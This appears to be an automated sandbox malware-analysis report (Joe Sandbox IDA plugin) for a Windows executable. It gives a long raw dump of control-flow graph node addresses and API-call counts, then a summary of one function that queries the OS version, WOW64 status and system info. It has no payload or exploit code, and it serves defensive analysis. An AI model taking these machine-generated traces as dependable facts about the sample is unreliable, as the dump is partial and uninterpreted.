GetVersionExW 98327->98328 98329 ba6b57 22 API calls 98328->98329 98330 ba4342 98329->98330 98331 ba93b2 22 API calls 98330->98331 98336 ba4378 98330->98336 98332 ba436c 98331->98332 98334 ba37a0 22 API calls 98332->98334 98333 ba441b GetCurrentProcess IsWow64Process 98335 ba4437 98333->98335 98334->98336 98337 ba444f LoadLibraryA 98335->98337 98338 be3824 GetSystemInfo 98335->98338 98336->98333 98341 be37df 98336->98341 98339 ba449c GetSystemInfo 98337->98339 98340 ba4460 GetProcAddress 98337->98340 98343 ba4476 98339->98343 98340->98339 98342 ba4470 GetNativeSystemInfo 98340->98342 98342->98343 98344 ba447a FreeLibrary 98343->98344 98345 ba109d 98343->98345 98344->98345 98346 bc00a3 29 API calls __onexit 98345->98346 98346->98325 98347 baf7bf 98348 baf7d3 98347->98348 98349 bafcb6 98347->98349 98351 bafcc2 98348->98351 98352 bbfddb 22 API calls 98348->98352 98440 baaceb 23 API calls ISource 98349->98440 98441 baaceb 23 API calls ISource 98351->98441 98354 baf7e5 98352->98354 98354->98351 98355 bafd3d 98354->98355 98356 baf83e 98354->98356 98442 c11155 22 API calls 98355->98442 98370 baed9d ISource 98356->98370 98382 bb1310 98356->98382 98359 bf4beb 98450 c1359c 82 API calls __wsopen_s 98359->98450 98361 bbfddb 22 API calls 98380 baec76 ISource 98361->98380 98363 bafef7 98366 baa8c7 22 API calls 98363->98366 98363->98370 98364 bf4600 98364->98370 98443 baa8c7 98364->98443 98365 bf4b0b 98448 c1359c 82 API calls __wsopen_s 98365->98448 98366->98370 98372 baa8c7 22 API calls 98372->98380 98373 bc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98373->98380 98374 bafbe3 98374->98370 98376 bf4bdc 98374->98376 98381 baf3ae ISource 98374->98381 98375 baa961 22 API calls 98375->98380 98449 c1359c 82 API calls __wsopen_s 98376->98449 98378 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98378->98380 98379 bc00a3 29 API calls pre_c_initialization 98379->98380 98380->98359 
98380->98361 98380->98363 98380->98364 98380->98365 98380->98370 98380->98372 98380->98373 98380->98374 98380->98375 98380->98378 98380->98379 98380->98381 98438 bb01e0 256 API calls 2 library calls 98380->98438 98439 bb06a0 41 API calls ISource 98380->98439 98381->98370 98447 c1359c 82 API calls __wsopen_s 98381->98447 98383 bb17b0 98382->98383 98384 bb1376 98382->98384 98698 bc0242 5 API calls __Init_thread_wait 98383->98698 98385 bb1390 98384->98385 98386 bf6331 98384->98386 98451 bb1940 98385->98451 98389 bf633d 98386->98389 98703 c2709c 256 API calls 98386->98703 98389->98380 98391 bb17ba 98393 bb17fb 98391->98393 98395 ba9cb3 22 API calls 98391->98395 98397 bf6346 98393->98397 98399 bb182c 98393->98399 98394 bb1940 9 API calls 98396 bb13b6 98394->98396 98402 bb17d4 98395->98402 98396->98393 98398 bb13ec 98396->98398 98704 c1359c 82 API calls __wsopen_s 98397->98704 98398->98397 98405 bb1408 __fread_nolock 98398->98405 98700 baaceb 23 API calls ISource 98399->98700 98699 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98402->98699 98403 bb1839 98701 bbd217 256 API calls 98403->98701 98405->98403 98407 bf636e 98405->98407 98415 bbfddb 22 API calls 98405->98415 98416 bbfe0b 22 API calls 98405->98416 98422 bb152f 98405->98422 98424 bf63b2 98405->98424 98426 bb15c7 ISource 98405->98426 98461 baec40 98405->98461 98705 c1359c 82 API calls __wsopen_s 98407->98705 98409 bb1872 98702 bbfaeb 23 API calls 98409->98702 98410 bb153c 98413 bb1940 9 API calls 98410->98413 98411 bf63d1 98707 c25745 54 API calls _wcslen 98411->98707 98414 bb1549 98413->98414 98418 bb1940 9 API calls 98414->98418 98414->98426 98415->98405 98416->98405 98429 bb1563 98418->98429 98419 bb171d 98419->98380 98422->98410 98422->98411 98423 bb1940 9 API calls 98423->98426 98706 c1359c 82 API calls __wsopen_s 98424->98706 98426->98409 98426->98423 98428 bb167b ISource 98426->98428 98485 c1744a 98426->98485 98542 bbeffa 98426->98542 98599 c2958b 98426->98599 98602 c0d4ce 
98426->98602 98605 c1f0ec 98426->98605 98614 c2959f 98426->98614 98617 c16ef1 98426->98617 98708 c1359c 82 API calls __wsopen_s 98426->98708 98428->98419 98697 bbce17 22 API calls ISource 98428->98697 98429->98426 98430 baa8c7 22 API calls 98429->98430 98430->98426 98438->98380 98439->98380 98440->98351 98441->98355 98442->98370 98444 baa8ea __fread_nolock 98443->98444 98445 baa8db 98443->98445 98444->98370 98445->98444 98446 bbfe0b 22 API calls 98445->98446 98446->98444 98447->98370 98448->98370 98449->98359 98450->98370 98452 bb195d 98451->98452 98453 bb1981 98451->98453 98460 bb13a0 98452->98460 98711 bc0242 5 API calls __Init_thread_wait 98452->98711 98709 bc0242 5 API calls __Init_thread_wait 98453->98709 98456 bb198b 98456->98452 98710 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98456->98710 98457 bb8727 98457->98460 98712 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98457->98712 98460->98394 98479 baec76 ISource 98461->98479 98462 bc00a3 29 API calls pre_c_initialization 98462->98479 98463 bbfddb 22 API calls 98463->98479 98464 bafef7 98470 baa8c7 22 API calls 98464->98470 98478 baed9d ISource 98464->98478 98467 bf4600 98473 baa8c7 22 API calls 98467->98473 98467->98478 98468 bf4b0b 98716 c1359c 82 API calls __wsopen_s 98468->98716 98469 baa8c7 22 API calls 98469->98479 98470->98478 98473->98478 98475 bc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98475->98479 98476 bafbe3 98476->98478 98480 bf4bdc 98476->98480 98484 baf3ae ISource 98476->98484 98477 baa961 22 API calls 98477->98479 98478->98405 98479->98462 98479->98463 98479->98464 98479->98467 98479->98468 98479->98469 98479->98475 98479->98476 98479->98477 98479->98478 98482 bf4beb 98479->98482 98483 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98479->98483 98479->98484 98713 bb01e0 256 API calls 2 library calls 98479->98713 98714 bb06a0 41 API 
calls ISource 98479->98714 98717 c1359c 82 API calls __wsopen_s 98480->98717 98718 c1359c 82 API calls __wsopen_s 98482->98718 98483->98479 98484->98478 98715 c1359c 82 API calls __wsopen_s 98484->98715 98486 c17469 98485->98486 98487 c17474 98485->98487 98769 bab567 98486->98769 98489 c17554 98487->98489 98491 baa961 22 API calls 98487->98491 98490 bbfddb 22 API calls 98489->98490 98540 c176a4 98489->98540 98492 c17587 98490->98492 98493 c17495 98491->98493 98494 bbfe0b 22 API calls 98492->98494 98495 baa961 22 API calls 98493->98495 98496 c17598 98494->98496 98497 c1749e 98495->98497 98719 ba6246 98496->98719 98499 ba7510 53 API calls 98497->98499 98501 c174aa 98499->98501 98774 ba525f 98501->98774 98502 baa961 22 API calls 98504 c175ab 98502->98504 98506 ba6246 CloseHandle 98504->98506 98505 c174bf 98816 ba6350 98505->98816 98508 c175b2 98506->98508 98723 ba7510 98508->98723 98511 c1754a 98516 bab567 39 API calls 98511->98516 98513 ba6246 CloseHandle 98515 c175c8 98513->98515 98514 c0d4ce 4 API calls 98517 c17502 98514->98517 98746 ba5745 98515->98746 98516->98489 98517->98511 98518 c17506 98517->98518 98520 ba9cb3 22 API calls 98518->98520 98522 c17513 98520->98522 98825 c0d2c1 26 API calls 98522->98825 98524 c175ea 98754 ba53de 98524->98754 98525 c176de GetLastError 98526 c176f7 98525->98526 98829 ba6216 CloseHandle ISource 98526->98829 98529 c1751c 98529->98511 98530 c175f8 98826 ba53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98530->98826 98532 c17645 98535 bbfddb 22 API calls 98532->98535 98533 c175ff 98533->98532 98534 c17619 98533->98534 98827 c0ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98534->98827 98536 c17679 98535->98536 98538 baa961 22 API calls 98536->98538 98539 c17686 98538->98539 98539->98540 98828 c0417d 22 API calls __fread_nolock 98539->98828 98540->98426 98882 ba9c6e 98542->98882 98546 bbfddb 22 API calls 98547 bbf02b 98546->98547 98549 bbfe0b 22 API calls 98547->98549 98548 bff0a8 98589 bbf0a4 98548->98589 
98920 c19caa 39 API calls 98548->98920 98550 bbf03c 98549->98550 98551 ba6246 CloseHandle 98550->98551 98552 bbf047 98551->98552 98554 baa961 22 API calls 98552->98554 98553 bab567 39 API calls 98555 bff10a 98553->98555 98556 bbf04f 98554->98556 98557 bbf0b1 98555->98557 98558 bff112 98555->98558 98559 ba6246 CloseHandle 98556->98559 98560 bbfa5b 3 API calls 98557->98560 98561 bab567 39 API calls 98558->98561 98562 bbf056 98559->98562 98566 bbf0b8 98560->98566 98561->98566 98563 ba7510 53 API calls 98562->98563 98564 bbf062 98563->98564 98565 ba6246 CloseHandle 98564->98565 98567 bbf06c 98565->98567 98568 bff127 98566->98568 98569 bbf0d3 98566->98569 98570 ba5745 5 API calls 98567->98570 98572 bbfe0b 22 API calls 98568->98572 98896 ba6270 98569->98896 98573 bbf07d 98570->98573 98575 bff12c 98572->98575 98576 bbf085 98573->98576 98577 bff0a0 98573->98577 98579 bff140 98575->98579 98921 bbf866 ReadFile SetFilePointerEx 98575->98921 98584 ba53de 27 API calls 98576->98584 98919 ba6216 CloseHandle ISource 98577->98919 98588 bff144 __fread_nolock 98579->98588 98922 c10e85 22 API calls ___scrt_fastfail 98579->98922 98583 bbf0ea 98583->98588 98916 ba62b5 22 API calls 98583->98916 98586 bbf093 98584->98586 98915 ba53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98586->98915 98589->98553 98589->98557 98590 bbf0fe 98593 bbf138 98590->98593 98594 ba6246 CloseHandle 98590->98594 98591 bff069 98918 c0ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98591->98918 98592 bbf09a 98592->98589 98592->98591 98593->98426 98596 bbf12c 98594->98596 98596->98593 98917 ba6216 CloseHandle ISource 98596->98917 98597 bff080 98597->98589 98953 c27f59 98599->98953 98601 c2959b 98601->98426 99045 c0dbbe lstrlenW 98602->99045 98606 ba7510 53 API calls 98605->98606 98607 c1f126 98606->98607 99050 ba9e90 98607->99050 98609 c1f136 98610 c1f15b 98609->98610 98611 baec40 256 API calls 98609->98611 98612 ba9c6e 22 API calls 98610->98612 98613 c1f15f 98610->98613 98611->98610 
98612->98613 98613->98426 98615 c27f59 120 API calls 98614->98615 98616 c295af 98615->98616 98616->98426 98618 baa961 22 API calls 98617->98618 98619 c16f1d 98618->98619 98620 baa961 22 API calls 98619->98620 98621 c16f26 98620->98621 98622 c16f3a 98621->98622 98623 bab567 39 API calls 98621->98623 98624 ba7510 53 API calls 98622->98624 98623->98622 98630 c16f57 _wcslen 98624->98630 98625 c16fbc 98628 ba7510 53 API calls 98625->98628 98626 c170bf 99087 ba4ecb 98626->99087 98631 c16fc8 98628->98631 98630->98625 98630->98626 98696 c170e9 98630->98696 98635 baa8c7 22 API calls 98631->98635 98638 c16fdb 98631->98638 98632 c170e5 98634 baa961 22 API calls 98632->98634 98632->98696 98633 ba4ecb 94 API calls 98633->98632 98636 c1711a 98634->98636 98635->98638 98639 baa961 22 API calls 98636->98639 98637 c17027 98641 ba7510 53 API calls 98637->98641 98638->98637 98640 c17005 98638->98640 98644 baa8c7 22 API calls 98638->98644 98642 c17126 98639->98642 98645 ba33c6 22 API calls 98640->98645 98646 c17034 98641->98646 98643 baa961 22 API calls 98642->98643 98647 c1712f 98643->98647 98644->98640 98648 c1700f 98645->98648 98649 c17047 98646->98649 98650 c1703d 98646->98650 98652 baa961 22 API calls 98647->98652 98653 ba7510 53 API calls 98648->98653 99218 c0e199 GetFileAttributesW 98649->99218 98654 baa8c7 22 API calls 98650->98654 98656 c17138 98652->98656 98657 c1701b 98653->98657 98654->98649 98655 c17050 98658 c17063 98655->98658 98661 ba4c6d 22 API calls 98655->98661 98659 ba7510 53 API calls 98656->98659 98660 ba6350 22 API calls 98657->98660 98663 ba7510 53 API calls 98658->98663 98669 c17069 98658->98669 98662 c17145 98659->98662 98660->98637 98661->98658 98664 ba525f 22 API calls 98662->98664 98665 c170a0 98663->98665 98666 c17166 98664->98666 99219 c0d076 57 API calls 98665->99219 98668 ba4c6d 22 API calls 98666->98668 98670 c17175 98668->98670 98669->98696 98671 c171a9 98670->98671 98673 ba4c6d 22 API calls 98670->98673 98672 baa8c7 22 API calls 98671->98672 98674 
c171ba 98672->98674 98675 c17186 98673->98675 98676 ba6350 22 API calls 98674->98676 98675->98671 98678 ba6b57 22 API calls 98675->98678 98677 c171c8 98676->98677 98679 ba6350 22 API calls 98677->98679 98680 c1719b 98678->98680 98682 c171d6 98679->98682 98681 ba6b57 22 API calls 98680->98681 98681->98671 98683 ba6350 22 API calls 98682->98683 98684 c171e4 98683->98684 98685 ba7510 53 API calls 98684->98685 98686 c171f0 98685->98686 99109 c0d7bc 98686->99109 98688 c17201 98689 c0d4ce 4 API calls 98688->98689 98690 c1720b 98689->98690 98691 ba7510 53 API calls 98690->98691 98695 c17239 98690->98695 98692 c17229 98691->98692 99163 c12947 98692->99163 99220 ba4f39 98695->99220 98696->98426 98697->98428 98698->98391 98699->98393 98700->98403 98701->98409 98702->98409 98703->98389 98704->98426 98705->98426 98706->98426 98707->98429 98708->98426 98709->98456 98710->98452 98711->98457 98712->98460 98713->98479 98714->98479 98715->98478 98716->98478 98717->98482 98718->98478 98720 ba625f 98719->98720 98721 ba6250 98719->98721 98720->98721 98722 ba6264 CloseHandle 98720->98722 98721->98502 98722->98721 98724 ba7522 98723->98724 98725 ba7525 98723->98725 98724->98513 98726 ba755b 98725->98726 98727 ba752d 98725->98727 98728 be50f6 98726->98728 98730 ba756d 98726->98730 98738 be500f 98726->98738 98830 bc51c6 26 API calls 98727->98830 98833 bc5183 26 API calls 98728->98833 98831 bbfb21 51 API calls 98730->98831 98731 ba753d 98736 bbfddb 22 API calls 98731->98736 98734 be510e 98734->98734 98739 ba7547 98736->98739 98737 be5088 98832 bbfb21 51 API calls 98737->98832 98738->98737 98741 bbfe0b 22 API calls 98738->98741 98740 ba9cb3 22 API calls 98739->98740 98740->98724 98742 be5058 98741->98742 98743 bbfddb 22 API calls 98742->98743 98744 be507f 98743->98744 98745 ba9cb3 22 API calls 98744->98745 98745->98737 98747 ba575c CreateFileW 98746->98747 98748 be4035 98746->98748 98749 ba577b 98747->98749 98748->98749 98750 be403b CreateFileW 98748->98750 98749->98524 98749->98525 
98750->98749 98751 be4063 98750->98751 98834 ba54c6 98751->98834 98755 ba53f3 98754->98755 98768 ba53f0 ISource 98754->98768 98756 ba54c6 3 API calls 98755->98756 98755->98768 98757 ba5410 98756->98757 98758 be3f4b 98757->98758 98759 ba541d 98757->98759 98846 bbfa5b 98758->98846 98761 bbfe0b 22 API calls 98759->98761 98762 ba5429 98761->98762 98763 ba5722 22 API calls 98762->98763 98764 ba5433 98763->98764 98840 ba9a40 98764->98840 98767 ba54c6 3 API calls 98767->98768 98768->98530 98770 bab578 98769->98770 98771 bab57f 98769->98771 98770->98771 98852 bc62d1 39 API calls _strftime 98770->98852 98771->98487 98773 bab5c2 98773->98487 98775 baa961 22 API calls 98774->98775 98776 ba5275 98775->98776 98777 baa961 22 API calls 98776->98777 98778 ba527d 98777->98778 98779 baa961 22 API calls 98778->98779 98780 ba5285 98779->98780 98781 baa961 22 API calls 98780->98781 98782 ba528d 98781->98782 98783 be3df5 98782->98783 98784 ba52c1 98782->98784 98785 baa8c7 22 API calls 98783->98785 98786 ba6d25 22 API calls 98784->98786 98787 be3dfe 98785->98787 98788 ba52cf 98786->98788 98789 baa6c3 22 API calls 98787->98789 98790 ba93b2 22 API calls 98788->98790 98792 ba5304 98789->98792 98791 ba52d9 98790->98791 98791->98792 98793 ba6d25 22 API calls 98791->98793 98796 ba5325 98792->98796 98806 be3e20 98792->98806 98809 ba5349 98792->98809 98795 ba52fa 98793->98795 98798 ba93b2 22 API calls 98795->98798 98796->98809 98866 ba4c6d 98796->98866 98797 ba535a 98800 ba5370 98797->98800 98805 baa8c7 22 API calls 98797->98805 98798->98792 98801 ba5384 98800->98801 98807 baa8c7 22 API calls 98800->98807 98804 ba538f 98801->98804 98810 baa8c7 22 API calls 98801->98810 98803 ba6b57 22 API calls 98813 be3ee0 98803->98813 98811 baa8c7 22 API calls 98804->98811 98815 ba539a 98804->98815 98805->98800 98806->98803 98807->98801 98808 ba6d25 22 API calls 98808->98809 98853 ba6d25 98809->98853 98810->98804 98811->98815 98812 ba4c6d 22 API calls 98812->98813 98813->98809 98813->98812 98869 ba49bd 22 API 
calls __fread_nolock 98813->98869 98815->98505 98817 ba6362 98816->98817 98818 be4a51 98816->98818 98871 ba6373 98817->98871 98881 ba4a88 22 API calls __fread_nolock 98818->98881 98821 ba636e 98821->98511 98821->98514 98822 be4a5b 98823 be4a67 98822->98823 98824 baa8c7 22 API calls 98822->98824 98824->98823 98825->98529 98826->98533 98827->98532 98828->98540 98829->98540 98830->98731 98831->98731 98832->98728 98833->98734 98835 ba54dd 98834->98835 98836 be3f9c SetFilePointerEx 98835->98836 98837 ba5564 SetFilePointerEx SetFilePointerEx 98835->98837 98838 be3f8b 98835->98838 98839 ba5530 98835->98839 98837->98839 98838->98836 98839->98749 98841 ba9abb 98840->98841 98842 ba9a4e 98840->98842 98851 bbe40f SetFilePointerEx 98841->98851 98844 ba543f 98842->98844 98845 ba9a8c ReadFile 98842->98845 98844->98767 98845->98842 98845->98844 98847 ba54c6 3 API calls 98846->98847 98848 bbfa79 98847->98848 98849 ba54c6 3 API calls 98848->98849 98850 bbfa9a 98849->98850 98850->98768 98851->98842 98852->98773 98854 ba6d91 98853->98854 98855 ba6d34 98853->98855 98856 ba93b2 22 API calls 98854->98856 98855->98854 98857 ba6d3f 98855->98857 98863 ba6d62 __fread_nolock 98856->98863 98858 ba6d5a 98857->98858 98859 be4c9d 98857->98859 98870 ba6f34 22 API calls 98858->98870 98860 bbfddb 22 API calls 98859->98860 98862 be4ca7 98860->98862 98864 bbfe0b 22 API calls 98862->98864 98863->98797 98865 be4cda 98864->98865 98867 baaec9 22 API calls 98866->98867 98868 ba4c78 98867->98868 98868->98808 98868->98809 98869->98813 98870->98863 98872 ba6382 98871->98872 98878 ba63b6 __fread_nolock 98871->98878 98873 be4a82 98872->98873 98874 ba63a9 98872->98874 98872->98878 98875 bbfddb 22 API calls 98873->98875 98876 baa587 22 API calls 98874->98876 98877 be4a91 98875->98877 98876->98878 98879 bbfe0b 22 API calls 98877->98879 98878->98821 98880 be4ac5 __fread_nolock 98879->98880 98881->98822 98883 ba9c7e 98882->98883 98884 bef545 98882->98884 98889 bbfddb 22 API calls 98883->98889 98885 bef556 
98884->98885 98887 ba6b57 22 API calls 98884->98887 98886 baa6c3 22 API calls 98885->98886 98888 bef560 98886->98888 98887->98885 98888->98888 98890 ba9c91 98889->98890 98891 ba9c9a 98890->98891 98892 ba9cac 98890->98892 98893 ba9cb3 22 API calls 98891->98893 98894 baa961 22 API calls 98892->98894 98895 ba9ca2 98893->98895 98894->98895 98895->98546 98895->98548 98897 bbfe0b 22 API calls 98896->98897 98898 ba6295 98897->98898 98899 bbfddb 22 API calls 98898->98899 98900 ba62a3 98899->98900 98901 bbf141 98900->98901 98902 bbf188 98901->98902 98903 bbf14c 98901->98903 98904 baa6c3 22 API calls 98902->98904 98903->98902 98906 bbf15b 98903->98906 98905 c0caeb 98904->98905 98913 c0cb1a 98905->98913 98931 c0ca89 ReadFile SetFilePointerEx 98905->98931 98932 ba49bd 22 API calls __fread_nolock 98905->98932 98907 bbf170 98906->98907 98909 bbf17d 98906->98909 98923 bbf18e 98907->98923 98930 c0cbf2 26 API calls 98909->98930 98912 bbf179 98912->98583 98913->98583 98915->98592 98916->98590 98917->98593 98918->98597 98919->98548 98920->98548 98921->98579 98922->98588 98933 bbf1d8 98923->98933 98929 bbf1c1 98929->98912 98930->98912 98931->98905 98932->98905 98934 bbfe0b 22 API calls 98933->98934 98935 bbf1ef 98934->98935 98936 bbfddb 22 API calls 98935->98936 98937 bbf1a6 98936->98937 98938 ba97b6 98937->98938 98945 ba9a1e 98938->98945 98940 ba97fc 98940->98929 98944 ba6e14 24 API calls 98940->98944 98941 ba9a40 2 API calls 98942 ba97c7 98941->98942 98942->98940 98942->98941 98952 ba9b01 22 API calls __fread_nolock 98942->98952 98944->98929 98946 ba9a2f 98945->98946 98947 bef378 98945->98947 98946->98942 98948 bbfddb 22 API calls 98947->98948 98949 bef382 98948->98949 98950 bbfe0b 22 API calls 98949->98950 98951 bef397 98950->98951 98952->98942 98954 ba7510 53 API calls 98953->98954 98955 c27f90 98954->98955 98980 c27fd5 ISource 98955->98980 98991 c28cd3 98955->98991 98957 c28281 98958 c2844f 98957->98958 98963 c2828f 98957->98963 99032 c28ee4 60 API calls 98958->99032 98961 c2845e 
98961->98963 98964 c2846a 98961->98964 98962 ba7510 53 API calls 98978 c28049 98962->98978 99004 c27e86 98963->99004 98964->98980 98969 c282c8 99019 bbfc70 98969->99019 98972 c28302 99026 ba63eb 22 API calls 98972->99026 98973 c282e8 99025 c1359c 82 API calls __wsopen_s 98973->99025 98976 c282f3 GetCurrentProcess TerminateProcess 98976->98972 98977 c28311 99027 ba6a50 22 API calls 98977->99027 98978->98957 98978->98962 98978->98980 99023 c0417d 22 API calls __fread_nolock 98978->99023 99024 c2851d 42 API calls _strftime 98978->99024 98980->98601 98981 c2832a 98990 c28352 98981->98990 99028 bb04f0 22 API calls 98981->99028 98982 c284c5 98982->98980 98987 c284d9 FreeLibrary 98982->98987 98984 c28341 99029 c28b7b 75 API calls 98984->99029 98987->98980 98990->98982 99030 bb04f0 22 API calls 98990->99030 99031 baaceb 23 API calls ISource 98990->99031 99033 c28b7b 75 API calls 98990->99033 98992 baaec9 22 API calls 98991->98992 98993 c28cee CharLowerBuffW 98992->98993 99034 c08e54 98993->99034 98997 baa961 22 API calls 98998 c28d2a 98997->98998 98999 ba6d25 22 API calls 98998->98999 99000 c28d3e 98999->99000 99001 ba93b2 22 API calls 99000->99001 99003 c28d48 _wcslen 99001->99003 99002 c28e5e _wcslen 99002->98978 99003->99002 99041 c2851d 42 API calls _strftime 99003->99041 99005 c27ea1 99004->99005 99006 c27eec 99004->99006 99007 bbfe0b 22 API calls 99005->99007 99010 c29096 99006->99010 99008 c27ec3 99007->99008 99008->99006 99009 bbfddb 22 API calls 99008->99009 99009->99008 99011 c292ab ISource 99010->99011 99018 c290ba _strcat _wcslen 99010->99018 99011->98969 99012 bab6b5 39 API calls 99012->99018 99013 bab567 39 API calls 99013->99018 99014 bab38f 39 API calls 99014->99018 99015 ba7510 53 API calls 99015->99018 99016 bcea0c 21 API calls ___std_exception_copy 99016->99018 99018->99011 99018->99012 99018->99013 99018->99014 99018->99015 99018->99016 99044 c0efae 24 API calls _wcslen 99018->99044 99021 bbfc85 99019->99021 99020 bbfd1d VirtualAlloc 99022 bbfceb 
99020->99022 99021->99020 99021->99022 99022->98972 99022->98973 99023->98978 99024->98978 99025->98976 99026->98977 99027->98981 99028->98984 99029->98990 99030->98990 99031->98990 99032->98961 99033->98990 99035 c08e74 _wcslen 99034->99035 99036 c08ea9 99035->99036 99037 c08f63 99035->99037 99040 c08f68 99035->99040 99036->99037 99042 bbce60 41 API calls 99036->99042 99037->98997 99037->99003 99040->99037 99043 bbce60 41 API calls 99040->99043 99041->99002 99042->99036 99043->99040 99044->99018 99046 c0d4d5 99045->99046 99047 c0dbdc GetFileAttributesW 99045->99047 99046->98426 99047->99046 99048 c0dbe8 FindFirstFileW 99047->99048 99048->99046 99049 c0dbf9 FindClose 99048->99049 99049->99046 99051 ba6270 22 API calls 99050->99051 99077 ba9eb5 99051->99077 99052 ba9fd2 99079 baa4a1 22 API calls __fread_nolock 99052->99079 99054 ba9fec 99054->98609 99057 baa6c3 22 API calls 99057->99077 99058 bef7c4 99084 c096e2 84 API calls __wsopen_s 99058->99084 99059 bef699 99065 bbfddb 22 API calls 99059->99065 99061 baa4a1 22 API calls 99061->99077 99062 baa405 99062->99054 99086 c096e2 84 API calls __wsopen_s 99062->99086 99067 bef754 99065->99067 99066 bef7d2 99085 baa4a1 22 API calls __fread_nolock 99066->99085 99070 bbfe0b 22 API calls 99067->99070 99069 bef7e8 99069->99054 99072 baa12c __fread_nolock 99070->99072 99072->99058 99072->99062 99073 baa587 22 API calls 99073->99077 99074 baaec9 22 API calls 99075 baa0db CharUpperBuffW 99074->99075 99080 baa673 22 API calls 99075->99080 99077->99052 99077->99057 99077->99058 99077->99059 99077->99061 99077->99062 99077->99072 99077->99073 99077->99074 99078 ba4573 41 API calls _wcslen 99077->99078 99081 ba48c8 23 API calls 99077->99081 99082 ba49bd 22 API calls __fread_nolock 99077->99082 99083 baa673 22 API calls 99077->99083 99078->99077 99079->99054 99080->99077 99081->99077 99082->99077 99083->99077 99084->99066 99085->99069 99086->99054 99226 ba4e90 LoadLibraryA 99087->99226 99092 be3ccf 99095 ba4f39 68 API calls 
99092->99095 99093 ba4ef6 LoadLibraryExW 99234 ba4e59 LoadLibraryA 99093->99234 99097 be3cd6 99095->99097 99099 ba4e59 3 API calls 99097->99099 99100 be3cde 99099->99100 99256 ba50f5 99100->99256 99101 ba4f20 99101->99100 99102 ba4f2c 99101->99102 99104 ba4f39 68 API calls 99102->99104 99106 ba4f31 99104->99106 99106->98632 99106->98633 99108 be3d05 99110 c0d7d8 99109->99110 99111 c0d7f3 99110->99111 99112 c0d7dd 99110->99112 99113 baa961 22 API calls 99111->99113 99114 baa8c7 22 API calls 99112->99114 99162 c0d7ee 99112->99162 99115 c0d7fb 99113->99115 99114->99162 99116 baa961 22 API calls 99115->99116 99117 c0d803 99116->99117 99118 baa961 22 API calls 99117->99118 99119 c0d80e 99118->99119 99120 baa961 22 API calls 99119->99120 99121 c0d816 99120->99121 99122 baa961 22 API calls 99121->99122 99123 c0d81e 99122->99123 99124 baa961 22 API calls 99123->99124 99125 c0d826 99124->99125 99126 baa961 22 API calls 99125->99126 99127 c0d82e 99126->99127 99128 baa961 22 API calls 99127->99128 99129 c0d836 99128->99129 99130 ba525f 22 API calls 99129->99130 99131 c0d84d 99130->99131 99132 ba525f 22 API calls 99131->99132 99133 c0d866 99132->99133 99134 ba4c6d 22 API calls 99133->99134 99135 c0d872 99134->99135 99136 c0d885 99135->99136 99138 ba93b2 22 API calls 99135->99138 99137 ba4c6d 22 API calls 99136->99137 99139 c0d88e 99137->99139 99138->99136 99140 c0d89e 99139->99140 99141 ba93b2 22 API calls 99139->99141 99142 c0d8b0 99140->99142 99143 baa8c7 22 API calls 99140->99143 99141->99140 99144 ba6350 22 API calls 99142->99144 99143->99142 99145 c0d8bb 99144->99145 99513 c0d978 22 API calls 99145->99513 99147 c0d8ca 99514 c0d978 22 API calls 99147->99514 99149 c0d8dd 99150 ba4c6d 22 API calls 99149->99150 99151 c0d8e7 99150->99151 99152 c0d8ec 99151->99152 99153 c0d8fe 99151->99153 99154 ba33c6 22 API calls 99152->99154 99155 ba4c6d 22 API calls 99153->99155 99156 c0d8f9 99154->99156 99157 c0d907 99155->99157 99160 ba6350 22 API calls 99156->99160 99158 c0d925 

                                                                      Control-flow Graph

                                                                      (rendered graph omitted; node summary) control_flow_graph 0: ba42de-ba434d call baa961, GetVersionExW, call ba6b57; ba435d-ba43bc call ba93b2, call ba37a0; ba441b-ba4435 GetCurrentProcess, IsWow64Process; ba444f-ba445e LoadLibraryA; ba4460-ba446e GetProcAddress; ba4470-ba4474 GetNativeSystemInfo; ba447a-ba447b FreeLibrary; ba449c-ba44a6 GetSystemInfo; be3824-be3828 GetSystemInfo.
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00BA430D
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • GetCurrentProcess.KERNEL32(?,00C3CB64,00000000,?,?), ref: 00BA4422
                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA4429
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4454
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00BA4466
                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00BA4474
                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BA447B
                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00BA44A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O$=
                                                                      • API String ID: 3290436268-487716248
